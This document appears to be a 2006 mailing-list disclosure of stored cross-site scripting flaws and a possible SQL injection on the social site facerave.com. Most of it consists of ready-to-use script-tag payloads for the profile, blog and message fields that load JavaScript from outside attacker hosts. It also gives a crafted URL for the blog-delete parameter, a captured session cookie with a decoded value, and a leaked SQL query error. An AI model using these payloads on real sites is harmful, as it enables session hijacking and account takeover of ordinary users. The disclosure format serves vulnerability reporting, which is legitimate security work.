Facerave.com - XSS & sessions disclosure

Sat, 17 Jun 2006 13:51:29 -0700 

Facerave.com


Homepage:

http://www.facerave.com


Effected files:


* Profile input boxes


- Self Description box


* Posting a blog entry


* Sending a message


index.php

------------------------------------------------------


XSS vuln with cookie disclosure via posting a comment:


No filter evasion needed. for PoC in yourself description box put:

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>


Screenshots:

http://www.youfucktard.com/xsp/facerave1.jpg

http://www.youfucktard.com/xsp/facerave2.jpg


-----------------------------------------------------


XSS vuln with cookie disclosure when posting a blog entry:


Same as above:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>


Screenshots:

http://www.youfucktard.com/xsp/facerave3.jpg

http://www.youfucktard.com/xsp/facerave4.jpg


Our cookie:


This is remote text via xss.js located at youfucktard.com lang=en; 
PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9;
 last_pr=7454



Breaking down the cookie:


PHPSESSID= (Our php session Id on the site)


voted= Base64 encoded. When we decode it we get:


a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6



----------------------------------------------------


XSS Vuln and possible SQL injection on deleting blog id:


http://www.facerave.com/index.php?req=blog&act=del&id=1087";>"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>


Query error msg:

You have an error in your SQL syntax near '\' AND b_user=7454' at line 1

Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454


Screenshot:

http://www.youfucktard.com/xsp/facerave5.jpg


-----------------------------------------------------


Sending a message xss vuln:


Same as above, no filter evasion. in your msg title or subject put:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>


Screenshot:

http://www.youfucktard.com/xsp/facerave6.jpg

------------------------------------------------------

Reply via email to